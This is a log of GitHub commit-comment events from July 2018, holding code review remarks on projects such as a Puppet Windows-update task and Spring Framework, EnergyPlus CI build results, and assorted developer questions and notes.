{"id":"7933836577","type":"CommitCommentEvent","actor":{"login":"glennsarti"},"repo":{"name":"beergeek/os_updates"},"payload":{"comment":{"id":29633253,"position":44,"line":40,"path":"tasks/win_checkupdates_wsus.rb","commit_id":"8f73123505ba986008f534c364212330695aa644","created_at":"2018-07-08T12:03:24Z","updated_at":"2018-07-08T12:03:24Z","author_association":"NONE","body":"Again...native ruby can do this.  No need to shell."}},"created_at":"2018-07-08T12:03:24Z"}
{"id":"7933837120","type":"CommitCommentEvent","actor":{"login":"glennsarti"},"repo":{"name":"beergeek/os_updates"},"payload":{"comment":{"id":29633254,"position":44,"line":40,"path":"tasks/win_checkupdates_wsus.rb","commit_id":"8f73123505ba986008f534c364212330695aa644","created_at":"2018-07-08T12:03:54Z","updated_at":"2018-07-08T12:03:54Z","author_association":"NONE","body":"`C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Modules` is a PowerShell 5 path.  Note this is different for PowerShell 6"}},"created_at":"2018-07-08T12:03:54Z"}
{"id":"7933837749","type":"CommitCommentEvent","actor":{"login":"akmalick"},"repo":{"name":"spring-projects/spring-framework"},"payload":{"comment":{"id":29633255,"position":null,"line":null,"path":null,"commit_id":"8d092227993f5a7ab3149e4c5fd9b379772d7d15","created_at":"2018-07-08T12:04:25Z","updated_at":"2018-07-08T12:04:25Z","author_association":"NONE","body":"Thank you for looking into this.\r\nI just feel word **element**(instead of **entry**) would be the best fit here. \r\nJust saying from the readability view point.\r\nThe most generic method is `queryForList(..)` which returns a `List` where each **element** is a `Map` containing one entry for each column, using the column name as the key.\r\n\r\nWould like to know your thoughts on that."}},"created_at":"2018-07-08T12:04:25Z"}
{"id":"7933838723","type":"CommitCommentEvent","actor":{"login":"glennsarti"},"repo":{"name":"beergeek/os_updates"},"payload":{"comment":{"id":29633258,"position":12,"line":11,"path":"tasks/win_ckeckupdate.json","commit_id":"8f73123505ba986008f534c364212330695aa644","created_at":"2018-07-08T12:05:12Z","updated_at":"2018-07-08T12:05:12Z","author_association":"NONE","body":"Note that PowerShell 5.1 (I think it's 5.1) has native support for installing modules from the PowerShell gallery.  `Install-Module PSWindowsUpdate -Force -Confirm:$false`"}},"created_at":"2018-07-08T12:05:12Z"}
{"id":"7933840643","type":"CommitCommentEvent","actor":{"login":"louen"},"repo":{"name":"STORM-IRIT/Radium-Engine"},"payload":{"comment":{"id":29633261,"position":11,"line":126,"path":"src/Core/CoreMacros.hpp","commit_id":"0d68bf270252bc8ea5913fd31e95c77ed03480cd","created_at":"2018-07-08T12:06:45Z","updated_at":"2018-07-08T12:06:45Z","author_association":"CONTRIBUTOR","body":"I know I come after the battle, but what was the need to include this macro ?\r\nThe fact that we use one less thread than the maximum is related to our application implementation, so it's a bit out of place in the macro file, which is very generic. "}},"created_at":"2018-07-08T12:06:45Z"}
{"id":"7933841973","type":"CommitCommentEvent","actor":{"login":"yaakovazat"},"repo":{"name":"yaakovazat/py10"},"payload":{"comment":{"id":29633264,"position":null,"line":null,"path":null,"commit_id":"c5e96c7f3c31936f1e94a558c6c3d561c6e2be9a","created_at":"2018-07-08T12:07:49Z","updated_at":"2018-07-08T12:07:49Z","author_association":"OWNER","body":"ice"}},"created_at":"2018-07-08T12:07:49Z"}
{"id":"7933842293","type":"CommitCommentEvent","actor":{"login":"ivowillemsen"},"repo":{"name":"ivowillemsen/b9lab-rps"},"payload":{"comment":{"id":29633265,"position":82,"line":69,"path":"contracts/RockPaperScissors.sol","commit_id":"f6d452abe1551e7d041cac5332dfd155d3c28e68","created_at":"2018-07-08T12:08:05Z","updated_at":"2018-07-08T12:08:05Z","author_association":"OWNER","body":"As far as I see it, the only restriction is with the approach that I see pointed out above by myself: I cannot start 4 games myself and expect other people to play against me. I would end up playing two games against myself"}},"created_at":"2018-07-08T12:08:05Z"}
{"id":"7933843367","type":"CommitCommentEvent","actor":{"login":"anthrotype"},"repo":{"name":"adobe-type-tools/psautohint"},"payload":{"comment":{"id":29633268,"position":null,"line":null,"path":null,"commit_id":"f009e5b433d3b6472d059b5a4e3c15ada3562bbd","created_at":"2018-07-08T12:08:58Z","updated_at":"2018-07-08T12:08:58Z","author_association":"MEMBER","body":"That’s cool! :+1"}},"created_at":"2018-07-08T12:08:58Z"}
{"id":"7933844778","type":"CommitCommentEvent","actor":{"login":"sbrannen"},"repo":{"name":"spring-projects/spring-framework"},"payload":{"comment":{"id":29633272,"position":null,"line":null,"path":null,"commit_id":"8d092227993f5a7ab3149e4c5fd9b379772d7d15","created_at":"2018-07-08T12:10:06Z","updated_at":"2018-07-08T12:10:06Z","author_association":"MEMBER","body":"Sure that makes sense: element of a list vs. entry in a map.\r\n\r\nI'll make the change.\r\n\r\nThanks!"}},"created_at":"2018-07-08T12:10:06Z"}
{"id":"7933845137","type":"CommitCommentEvent","actor":{"login":"dyusuf"},"repo":{"name":"bornabesic/cytokine-graph-db"},"payload":{"comment":{"id":29633274,"position":4,"line":201,"path":"string_db.html","commit_id":"510824c654269a811ad90230884f954e4347963b","created_at":"2018-07-08T12:10:21Z","updated_at":"2018-07-08T12:10:21Z","author_association":"COLLABORATOR","body":"yes, this the most intuitive way. well, I guess more sophisticated NLP is much more difficult. right? what do you think?\r\n\r\nI would suggest that we skip the step of text mining and use whatever they offer in regards, at least at the beginning. \r\n\r\nlet's first focus on a toy neo4j database with info of association and predicted action."}},"created_at":"2018-07-08T12:10:21Z"}
{"id":"7933846680","type":"CommitCommentEvent","actor":{"login":"sbrannen"},"repo":{"name":"spring-projects/spring-framework"},"payload":{"comment":{"id":29633279,"position":null,"line":null,"path":null,"commit_id":"8d092227993f5a7ab3149e4c5fd9b379772d7d15","created_at":"2018-07-08T12:11:38Z","updated_at":"2018-07-08T12:11:38Z","author_association":"MEMBER","body":"Done: 581acb62a0e0ecf35b5b829f2cd79e6afb37b6e7"}},"created_at":"2018-07-08T12:11:38Z"}
{"id":"7933848074","type":"CommitCommentEvent","actor":{"login":"beergeek"},"repo":{"name":"beergeek/os_updates"},"payload":{"comment":{"id":29633283,"position":25,"line":21,"path":"tasks/win_checkupdates_wsus.rb","commit_id":"8f73123505ba986008f534c364212330695aa644","created_at":"2018-07-08T12:12:42Z","updated_at":"2018-07-08T12:12:42Z","author_association":"OWNER","body":"No real reason. I can change"}},"created_at":"2018-07-08T12:12:42Z"}
{"id":"7933848191","type":"CommitCommentEvent","actor":{"login":"beergeek"},"repo":{"name":"beergeek/os_updates"},"payload":{"comment":{"id":29633284,"position":18,"line":14,"path":"tasks/win_checkupdates_wsus.rb","commit_id":"8f73123505ba986008f534c364212330695aa644","created_at":"2018-07-08T12:12:49Z","updated_at":"2018-07-08T12:12:49Z","author_association":"OWNER","body":"changed"}},"created_at":"2018-07-08T12:12:49Z"}
{"id":"7933848281","type":"CommitCommentEvent","actor":{"login":"beergeek"},"repo":{"name":"beergeek/os_updates"},"payload":{"comment":{"id":29633286,"position":13,"line":9,"path":"tasks/win_checkupdates_wsus.rb","commit_id":"8f73123505ba986008f534c364212330695aa644","created_at":"2018-07-08T12:12:53Z","updated_at":"2018-07-08T12:12:53Z","author_association":"OWNER","body":"changed"}},"created_at":"2018-07-08T12:12:53Z"}
{"id":"7933849401","type":"CommitCommentEvent","actor":{"login":"beergeek"},"repo":{"name":"beergeek/os_updates"},"payload":{"comment":{"id":29633290,"position":36,"line":32,"path":"tasks/win_checkupdates_wsus.rb","commit_id":"8f73123505ba986008f534c364212330695aa644","created_at":"2018-07-08T12:13:45Z","updated_at":"2018-07-08T12:13:45Z","author_association":"OWNER","body":"Noted"}},"created_at":"2018-07-08T12:13:45Z"}
{"id":"7933849965","type":"CommitCommentEvent","actor":{"login":"beergeek"},"repo":{"name":"beergeek/os_updates"},"payload":{"comment":{"id":29633292,"position":44,"line":40,"path":"tasks/win_checkupdates_wsus.rb","commit_id":"8f73123505ba986008f534c364212330695aa644","created_at":"2018-07-08T12:14:14Z","updated_at":"2018-07-08T12:14:14Z","author_association":"OWNER","body":"Damn it! Now I have to find out the PS paths"}},"created_at":"2018-07-08T12:14:14Z"}
{"id":"7933851362","type":"CommitCommentEvent","actor":{"login":"akmalick"},"repo":{"name":"spring-projects/spring-framework"},"payload":{"comment":{"id":29633299,"position":null,"line":null,"path":null,"commit_id":"8d092227993f5a7ab3149e4c5fd9b379772d7d15","created_at":"2018-07-08T12:15:19Z","updated_at":"2018-07-08T12:15:19Z","author_association":"NONE","body":"That's great. thank you :)"}},"created_at":"2018-07-08T12:15:19Z"}
{"id":"7933852263","type":"CommitCommentEvent","actor":{"login":"T-X"},"repo":{"name":"T-X/gluon"},"payload":{"comment":{"id":29633300,"position":null,"line":null,"path":null,"commit_id":"46c5effae39832c6695491d910eba1a366c163ab","created_at":"2018-07-08T12:16:01Z","updated_at":"2018-07-08T12:16:01Z","author_association":"OWNER","body":"Were there some performance measurements here? If I remember correctly then Dave was already quite unhappy with the reduction to 1MB. Does fq-codel work properly at 256KB at all or would it make sense to switch the queueing algorithm then?"}},"created_at":"2018-07-08T12:16:01Z"}
{"id":"7933856596","type":"CommitCommentEvent","actor":{"login":"nrel-bot-3"},"repo":{"name":"NREL/EnergyPlus"},"payload":{"comment":{"id":29633303,"position":null,"line":null,"path":null,"commit_id":"07dda535fbba5325b4ddbe577e9fdbc75876a6a7","created_at":"2018-07-08T12:19:02Z","updated_at":"2018-07-08T12:19:02Z","author_association":"NONE","body":"179D_Reporting-v8.8.0 (Myoldmopar) - x86_64-MacOS-10.9-clang: OK (2932 of 2932 tests passed, 8 test warnings)\n\nMessages:\n\n * 8 tests had: AUD diffs.\n\n\n\n\n<a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-07dda535fbba5325b4ddbe577e9fdbc75876a6a7-x86_64-MacOS-10.9-clang.html'>![Build Badge](http://img.shields.io/badge/build%20status-passing-green.png)</a> <a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-07dda535fbba5325b4ddbe577e9fdbc75876a6a7-x86_64-MacOS-10.9-clang.html'>![Test Badge](http://img.shields.io/badge/tests%20passed-100.0%25-green.png)</a> \n"}},"created_at":"2018-07-08T12:19:02Z"}
{"id":"7933858895","type":"CommitCommentEvent","actor":{"login":"mbrown711"},"repo":{"name":"mbrown711/MOOC-Exercise-39"},"payload":{"comment":{"id":29633308,"position":null,"line":null,"path":null,"commit_id":"2be8780112fbf9b7c527a169cb3cf74d087050a6","created_at":"2018-07-08T12:20:51Z","updated_at":"2018-07-08T12:20:51Z","author_association":"OWNER","body":"this was the first submission for exercise 39"}},"created_at":"2018-07-08T12:20:51Z"}
{"id":"7933859474","type":"CommitCommentEvent","actor":{"login":"Rexxt"},"repo":{"name":"Rexxt/buttons"},"payload":{"comment":{"id":29633309,"position":5,"line":5,"path":"index.html","commit_id":"b87da3c672c971c1e26bfa4d788c30a71df6f586","created_at":"2018-07-08T12:21:18Z","updated_at":"2018-07-08T12:21:18Z","author_association":"OWNER","body":"Edited title"}},"created_at":"2018-07-08T12:21:18Z"}
{"id":"7933860133","type":"CommitCommentEvent","actor":{"login":"mbrown711"},"repo":{"name":"mbrown711/MOOC-Exercise-39"},"payload":{"comment":{"id":29633311,"position":4,"line":12,"path":"Exercise39.java","commit_id":"a2a0731ac2d03a481e0c0ecc73649906d0d1a1eb","created_at":"2018-07-08T12:21:54Z","updated_at":"2018-07-08T12:21:54Z","author_association":"OWNER","body":"the code kept printing stars on a new line, had to get rid of the \"ln\" in pintln here."}},"created_at":"2018-07-08T12:21:54Z"}
{"id":"7933860803","type":"CommitCommentEvent","actor":{"login":"s3698784"},"repo":{"name":"s3698784/s3698784.GITHUB.IO"},"payload":{"comment":{"id":29633315,"position":null,"line":null,"path":null,"commit_id":"1b376d8849780271d6bfc46fa2986b6fbe9846d3","created_at":"2018-07-08T12:22:26Z","updated_at":"2018-07-08T12:22:26Z","author_association":"OWNER","body":"add content"}},"created_at":"2018-07-08T12:22:26Z"}
{"id":"7933860879","type":"CommitCommentEvent","actor":{"login":"mbrown711"},"repo":{"name":"mbrown711/MOOC-Exercise-39"},"payload":{"comment":{"id":29633316,"position":9,"line":15,"path":"Exercise39.java","commit_id":"a2a0731ac2d03a481e0c0ecc73649906d0d1a1eb","created_at":"2018-07-08T12:22:30Z","updated_at":"2018-07-08T12:22:30Z","author_association":"OWNER","body":"this had to stay as println, since the new stars were going to be printed on new lines"}},"created_at":"2018-07-08T12:22:30Z"}
{"id":"7933860938","type":"CommitCommentEvent","actor":{"login":"whyang0808"},"repo":{"name":"whyang0808/burger-project"},"payload":{"comment":{"id":29633317,"position":2,"line":2,"path":"burger-app/src/components/Burger/BuildControls/BuildControl/BuildControl.js","commit_id":"97828083751a87d512de5e98431d72c470feab55","created_at":"2018-07-08T12:22:32Z","updated_at":"2018-07-08T12:22:32Z","author_association":"OWNER","body":"Typo here."}},"created_at":"2018-07-08T12:22:32Z"}
{"id":"7933861927","type":"CommitCommentEvent","actor":{"login":"Hongarc"},"repo":{"name":"lamquangminh/EVKey"},"payload":{"comment":{"id":29633321,"position":null,"line":null,"path":null,"commit_id":"969e894856e409d7ed631b74d503e5660526b4ea","created_at":"2018-07-08T12:23:18Z","updated_at":"2018-07-08T12:23:18Z","author_association":"NONE","body":"Tất nhiên là tải đc ví dụ [EVKey64.exe](https://github.com/lamquangminh/EVKey/releases/download/Release/EVKey64.exe) \r\nĐể nếu mình muốn tải các phiên bản bấm vô `release` là thấy luôn (tất nhiên bạn vô xem lịch sử commit vẫn được nhưng cái đó nên là code các thứ)\r\nBạn có thể upload vô mục `Release` các file cần tải (để bạn dùng cho update) và 1 file nén (để ai đó muốn tải cả khỏi tải file nhỏ)\r\nVà cũng cảm ơn bạn bỏ sức ra làm cái này. 🎉 👍 "}},"created_at":"2018-07-08T12:23:18Z"}
{"id":"7933869680","type":"CommitCommentEvent","actor":{"login":"RichardGarcia"},"repo":{"name":"RichardGarcia/react-udemy"},"payload":{"comment":{"id":29633337,"position":null,"line":null,"path":null,"commit_id":"4a3f578c4495fff7fe904f87bfc79fc4db2198d0","created_at":"2018-07-08T12:29:24Z","updated_at":"2018-07-08T12:29:24Z","author_association":"OWNER","body":"read this..\r\nTo Which Events Can You Listen? - https://reactjs.org/docs/events.html#supported-events"}},"created_at":"2018-07-08T12:29:24Z"}
{"id":"7933871111","type":"CommitCommentEvent","actor":{"login":"nrel-bot-3"},"repo":{"name":"NREL/EnergyPlus"},"payload":{"comment":{"id":29633342,"position":null,"line":null,"path":null,"commit_id":"8a7f7d6f776766877ad6790104bde49a6bc29894","created_at":"2018-07-08T12:30:28Z","updated_at":"2018-07-08T12:30:28Z","author_association":"NONE","body":"develop (Myoldmopar) - x86_64-MacOS-10.9-clang: OK (2308 of 2308 tests passed, 0 test warnings)\n\n\n\n\n\n\n<a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-8a7f7d6f776766877ad6790104bde49a6bc29894-x86_64-MacOS-10.9-clang.html'>![Build Badge](http://img.shields.io/badge/build%20status-passing-green.png)</a> <a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-8a7f7d6f776766877ad6790104bde49a6bc29894-x86_64-MacOS-10.9-clang.html'>![Test Badge](http://img.shields.io/badge/tests%20passed-100.0%25-green.png)</a> \n"}},"created_at":"2018-07-08T12:30:28Z"}
{"id":"7933871878","type":"CommitCommentEvent","actor":{"login":"nrel-bot"},"repo":{"name":"NREL/EnergyPlus"},"payload":{"comment":{"id":29633343,"position":null,"line":null,"path":null,"commit_id":"8a7f7d6f776766877ad6790104bde49a6bc29894","created_at":"2018-07-08T12:30:58Z","updated_at":"2018-07-08T12:30:58Z","author_association":"NONE","body":"develop (Myoldmopar) - Win64-Windows-7-VisualStudio-14: OK (2308 of 2308 tests passed, 0 test warnings)\n\n\n\n\n\n\n<a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-8a7f7d6f776766877ad6790104bde49a6bc29894-Win64-Windows-7-VisualStudio-14.html'>![Build Badge](http://img.shields.io/badge/build%20status-passing-green.png)</a> <a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-8a7f7d6f776766877ad6790104bde49a6bc29894-Win64-Windows-7-VisualStudio-14.html'>![Test Badge](http://img.shields.io/badge/tests%20passed-100.0%25-green.png)</a> \n"}},"created_at":"2018-07-08T12:30:58Z"}
{"id":"7933875497","type":"CommitCommentEvent","actor":{"login":"nrel-bot-2"},"repo":{"name":"NREL/EnergyPlus"},"payload":{"comment":{"id":29633352,"position":null,"line":null,"path":null,"commit_id":"07dda535fbba5325b4ddbe577e9fdbc75876a6a7","created_at":"2018-07-08T12:33:43Z","updated_at":"2018-07-08T12:33:43Z","author_association":"NONE","body":"179D_Reporting-v8.8.0 (Myoldmopar) - x86_64-Linux-Ubuntu-14.04-gcc-4.8: OK (2971 of 2972 tests passed, 11 test warnings)\n\nMessages:\n\n * 11 tests had: AUD diffs.\n\nFailures:\n\n\nEnergyPlusFixture Test Summary\n * Passed: 644\n * Failed: 1\n\n\n<a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-07dda535fbba5325b4ddbe577e9fdbc75876a6a7-x86_64-Linux-Ubuntu-14.04-gcc-4.8.html'>![Build Badge](http://img.shields.io/badge/build%20status-passing-green.png)</a> <a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-07dda535fbba5325b4ddbe577e9fdbc75876a6a7-x86_64-Linux-Ubuntu-14.04-gcc-4.8.html'>![Test Badge](http://img.shields.io/badge/tests%20passed-99.97%25-yellow.png)</a> \n"}},"created_at":"2018-07-08T12:33:43Z"}
{"id":"7933881805","type":"CommitCommentEvent","actor":{"login":"nrel-bot-2"},"repo":{"name":"NREL/EnergyPlus"},"payload":{"comment":{"id":29633359,"position":null,"line":null,"path":null,"commit_id":"07dda535fbba5325b4ddbe577e9fdbc75876a6a7","created_at":"2018-07-08T12:38:36Z","updated_at":"2018-07-08T12:38:36Z","author_association":"NONE","body":"179D_Reporting-v8.8.0 (Myoldmopar) - x86_64-Linux-Ubuntu-14.04-cppcheck-1.61: OK (0 of 0 tests passed, 0 test warnings)\n\n\n\n\n\n\n<a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-07dda535fbba5325b4ddbe577e9fdbc75876a6a7-x86_64-Linux-Ubuntu-14.04-cppcheck-1.61.html'>![Build Badge](http://img.shields.io/badge/build%20status-passing-green.png)</a>  \n"}},"created_at":"2018-07-08T12:38:36Z"}
{"id":"7933882203","type":"CommitCommentEvent","actor":{"login":"tutitu3"},"repo":{"name":"summerpr/the"},"payload":{"comment":{"id":29633360,"position":null,"line":null,"path":null,"commit_id":"38f57cc1eade69e547dc1b8164e2900941e5dd18","created_at":"2018-07-08T12:38:56Z","updated_at":"2018-07-08T12:38:56Z","author_association":"CONTRIBUTOR","body":"90"}},"created_at":"2018-07-08T12:38:56Z"}
{"id":"7933882412","type":"CommitCommentEvent","actor":{"login":"tutitu3"},"repo":{"name":"summerpr/the"},"payload":{"comment":{"id":29633361,"position":6,"line":6,"path":"screen","commit_id":"38f57cc1eade69e547dc1b8164e2900941e5dd18","created_at":"2018-07-08T12:39:05Z","updated_at":"2018-07-08T12:39:05Z","author_association":"CONTRIBUTOR","body":"90"}},"created_at":"2018-07-08T12:39:05Z"}
{"id":"7933883605","type":"CommitCommentEvent","actor":{"login":"sk33p"},"repo":{"name":"sk33p/bdpicult"},"payload":{"comment":{"id":29633362,"position":null,"line":null,"path":null,"commit_id":"494c04fb6e62adca61bcfe3f20ec2647ec33596e","created_at":"2018-07-08T12:40:04Z","updated_at":"2018-07-08T12:40:04Z","author_association":"OWNER","body":"It is the scrapy project that scrape info from the site.\r\nYou have to run main.py.\r\n"}},"created_at":"2018-07-08T12:40:04Z"}
{"id":"7933886118","type":"CommitCommentEvent","actor":{"login":"1131153523"},"repo":{"name":"1131153523/test"},"payload":{"comment":{"id":29633366,"position":null,"line":null,"path":null,"commit_id":"3812cd6bf31eb8f1425af0fa96b9df75e14157c5","created_at":"2018-07-08T12:41:57Z","updated_at":"2018-07-08T12:41:57Z","author_association":"OWNER","body":"images"}},"created_at":"2018-07-08T12:41:57Z"}
{"id":"7933887970","type":"CommitCommentEvent","actor":{"login":"yasinghmba05"},"repo":{"name":"moniq/LandSharesFront"},"payload":{"comment":{"id":29633370,"position":null,"line":null,"path":null,"commit_id":"9d1beceda8914740fc2f21573c501fe0781aca84","created_at":"2018-07-08T12:43:23Z","updated_at":"2018-07-08T12:43:23Z","author_association":"NONE","body":"i still cant see the code working?"}},"created_at":"2018-07-08T12:43:23Z"}
{"id":"7933888242","type":"CommitCommentEvent","actor":{"login":"tudo75"},"repo":{"name":"rg3/youtube-dl"},"payload":{"comment":{"id":29633372,"position":null,"line":null,"path":null,"commit_id":"94fef94d9c8571db255b0f3694617f5cd56825b8","created_at":"2018-07-08T12:43:36Z","updated_at":"2018-07-08T12:43:36Z","author_association":"NONE","body":"I don't know how to do it and instructions are very poor.\r\nI'd like to know if exists exe other than official release, like daily builds compiled by someone.\r\nThanks for all"}},"created_at":"2018-07-08T12:43:36Z"}
{"id":"7933888794","type":"CommitCommentEvent","actor":{"login":"ThaTiemsz"},"repo":{"name":"DJScias/Discord-Datamining"},"payload":{"comment":{"id":29633374,"position":null,"line":null,"path":null,"commit_id":"8b51fac5b148ef0adaa8081dc2e2db6736750327","created_at":"2018-07-08T12:44:04Z","updated_at":"2018-07-08T12:44:04Z","author_association":"COLLABORATOR","body":"- New `PageAnalyticsLocation`: `Landing`\r\n- New routes:\r\n• `LOGIN_AND_REDIRECT`: `/login?redirect_to=`\r\n• `REGISTER_AND_REDIRECT`: `/register?redirect_to=`\r\n"}},"created_at":"2018-07-08T12:44:04Z"}
{"id":"7933889745","type":"CommitCommentEvent","actor":{"login":"Devoxin"},"repo":{"name":"Devoxin/Lavalink.py"},"payload":{"comment":{"id":29633377,"position":null,"line":null,"path":null,"commit_id":"c14cddaca46aa155921639c09f5b71fdd37d3413","created_at":"2018-07-08T12:44:48Z","updated_at":"2018-07-08T12:44:48Z","author_association":"OWNER","body":"Probably better to check the loadType"}},"created_at":"2018-07-08T12:44:48Z"}
{"id":"7933891550","type":"CommitCommentEvent","actor":{"login":"getraid"},"repo":{"name":"getraid/SHAIO"},"payload":{"comment":{"id":29633381,"position":null,"line":null,"path":null,"commit_id":"1bc7aaee6e6973af66a3533b37aeb479913018a8","created_at":"2018-07-08T12:46:11Z","updated_at":"2018-07-08T12:46:11Z","author_association":"OWNER","body":"Hey, to simplify things: Once you think a new build should be done/is necessary because mayor things changed, just create an issue that says new build should be done or something like that. Thank you as always!"}},"created_at":"2018-07-08T12:46:11Z"}
{"id":"7933891711","type":"CommitCommentEvent","actor":{"login":"jekkos"},"repo":{"name":"opensourcepos/opensourcepos"},"payload":{"comment":{"id":29633382,"position":null,"line":null,"path":null,"commit_id":"1026ebb0ebd632ef7a9c660f8c6f59fd448e8f73","created_at":"2018-07-08T12:46:18Z","updated_at":"2018-07-08T12:46:18Z","author_association":"MEMBER","body":"@skaman123 you are right, it seems to stack up the token twice. However there's no functional issue as the token is validated by the backend (403). So I guess this is probably a cosmetic thing then"}},"created_at":"2018-07-08T12:46:18Z"}
{"id":"7933893411","type":"CommitCommentEvent","actor":{"login":"AKryukov92"},"repo":{"name":"YMnkf/java18may"},"payload":{"comment":{"id":29633385,"position":24,"line":24,"path":"Java18_05_2018/src/LR2/Task27_global_var_template_case.java","commit_id":"16193d982a26cbaf99f95b6d9b092d49fe090daf","created_at":"2018-07-08T12:47:39Z","updated_at":"2018-07-08T12:47:39Z","author_association":"CONTRIBUTOR","body":"Что если у вас будет не 3 условия, а 4 или 5?\r\nЯ вам на каком-то занятии рассказывал и сейчас еще раз напомню.\r\n\r\nКонструкцию вида:\r\n```\r\nif(a<=0 && b<=0){\r\n  print(\"некорректное a\")\r\n  print(\"некорректное b\")\r\n  return\r\n}\r\nif(a<=0){\r\n  print(\"некорректное a\")\r\n  return\r\n}\r\nif(b<=0){\r\n  print(\"некорректное b\")\r\n  return\r\n}\r\n```\r\nможно упростить с помощью вспомогательной переменной.\r\n```\r\nerror_found = false\r\nif(a<=0){\r\n  print(\"некорректное a\")\r\n  error_found=true\r\n}\r\nif(b<=0){\r\n  print(\"некорректное b\")\r\n  error_found=true\r\n}\r\nif(error_found){\r\n  return\r\n}\r\n```\r\nТакой вариант не будет \"ветвиться\" в случаях, когда у вас много переменных.\r\n\r\nСделайте еще один вариант этого задания, чтобы потренироваться такому приему."}},"created_at":"2018-07-08T12:47:39Z"}
{"id":"7933893632","type":"CommitCommentEvent","actor":{"login":"RiichiroOka"},"repo":{"name":"RiichiroOka/test_repository"},"payload":{"comment":{"id":29633386,"position":null,"line":null,"path":null,"commit_id":"840dc3a0bc64b0ad7fa0031970d88d1982e4c71b","created_at":"2018-07-08T12:47:50Z","updated_at":"2018-07-08T12:47:50Z","author_association":"OWNER","body":"My test is seccess!"}},"created_at":"2018-07-08T12:47:50Z"}
{"id":"7933895316","type":"CommitCommentEvent","actor":{"login":"LIQRGV"},"repo":{"name":"ant-design/ant-design-pro"},"payload":{"comment":{"id":29633390,"position":null,"line":null,"path":null,"commit_id":"fba1af02e4ebe0bfc06306bf12284f210626948d","created_at":"2018-07-08T12:49:04Z","updated_at":"2018-07-08T12:49:04Z","author_association":"NONE","body":"Does it split compiled file ?"}},"created_at":"2018-07-08T12:49:04Z"}
{"id":"7933897618","type":"CommitCommentEvent","actor":{"login":"majestrate"},"repo":{"name":"majestrate/llarp"},"payload":{"comment":{"id":29633391,"position":94,"line":160,"path":"llarp/dht.cpp","commit_id":"d2a4f0b1030a944972164d4e9281fbb23f2812c6","created_at":"2018-07-08T12:50:51Z","updated_at":"2018-07-08T12:50:51Z","author_association":"OWNER","body":"note to self, this is a bug, i should instead add it to replies and return true."}},"created_at":"2018-07-08T12:50:51Z"}
{"id":"7933899428","type":"CommitCommentEvent","actor":{"login":"danielgindi"},"repo":{"name":"facebook/react-native"},"payload":{"comment":{"id":29633398,"position":null,"line":null,"path":null,"commit_id":"b81c8b51fc6fe3c2dece72e3fe500e175613c5d4","created_at":"2018-07-08T12:52:14Z","updated_at":"2018-07-08T12:52:14Z","author_association":"NONE","body":"Is it just me or it doesn't work with 0.56?"}},"created_at":"2018-07-08T12:52:14Z"}
{"id":"7933902742","type":"CommitCommentEvent","actor":{"login":"pavelbinar"},"repo":{"name":"rg3/youtube-dl"},"payload":{"comment":{"id":29633401,"position":null,"line":null,"path":null,"commit_id":"69fcdb845b9744125161f514cb4166becbae2959","created_at":"2018-07-08T12:54:54Z","updated_at":"2018-07-08T12:54:54Z","author_association":"NONE","body":"Works well.\r\nThank you! 👍 "}},"created_at":"2018-07-08T12:54:54Z"}
{"id":"7933904010","type":"CommitCommentEvent","actor":{"login":"akimlyubchenko"},"repo":{"name":"akimlyubchenko/Training-Summer-Express-2018"},"payload":{"comment":{"id":29633409,"position":41,"line":41,"path":"NET.S.2018.Lyubchenko.04/DoubleToBinary/DoubleToBinary.cs","commit_id":"c7bba2b50a94542e32594c0ba8da7eb0588efec8","created_at":"2018-07-08T12:55:57Z","updated_at":"2018-07-08T12:55:57Z","author_association":"OWNER","body":"Выполнено"}},"created_at":"2018-07-08T12:55:57Z"}
{"id":"7933906643","type":"CommitCommentEvent","actor":{"login":"baffioso"},"repo":{"name":"ballerupgis/bilreg"},"payload":{"comment":{"id":29633416,"position":null,"line":null,"path":null,"commit_id":"1038e5fa1ff73ca5b56764764d49f89478a5c098","created_at":"2018-07-08T12:58:01Z","updated_at":"2018-07-08T12:58:01Z","author_association":"MEMBER","body":"@nixen97 Har udvidet med to nye funktioner. Den ene opdaterer parkerings dropdown med parkeringspladser. Den anden opdaterer formularen med oplysninger (bilreg, p-plads) for eksisterende biler. "}},"created_at":"2018-07-08T12:58:01Z"}
{"id":"7933913384","type":"CommitCommentEvent","actor":{"login":"nrel-bot"},"repo":{"name":"antretterf/EnergyPlus"},"payload":{"comment":{"id":29633428,"position":null,"line":null,"path":null,"commit_id":"f3da7217b803b6bc1de06c6a9e9884b017ba381c","created_at":"2018-07-08T13:02:45Z","updated_at":"2018-07-08T13:02:45Z","author_association":"NONE","body":"HAMT1_180406 (antretterf) - i386-Windows-7-VisualStudio-14: OK (2928 of 2928 tests passed, 0 test warnings)\n\n\n\n\n\n\n<a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-f3da7217b803b6bc1de06c6a9e9884b017ba381c-PR6715-i386-Windows-7-VisualStudio-14.html'>![Build Badge](http://img.shields.io/badge/build%20status-passing-green.png)</a> <a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-f3da7217b803b6bc1de06c6a9e9884b017ba381c-PR6715-i386-Windows-7-VisualStudio-14.html'>![Test Badge](http://img.shields.io/badge/tests%20passed-100.0%25-green.png)</a> \n"}},"created_at":"2018-07-08T13:02:45Z"}
{"id":"7933913833","type":"CommitCommentEvent","actor":{"login":"ChillsLove"},"repo":{"name":"high-speed-downloader/high-speed-downloader"},"payload":{"comment":{"id":29633429,"position":null,"line":null,"path":null,"commit_id":"b1890ae92e98a312ad491de990b5717303b7a727","created_at":"2018-07-08T13:03:04Z","updated_at":"2018-07-08T13:03:04Z","author_association":"NONE","body":"我下载一个东西，他下到100%都没停，下到了198.5% 吓一跳 希望修复一下"}},"created_at":"2018-07-08T13:03:04Z"}
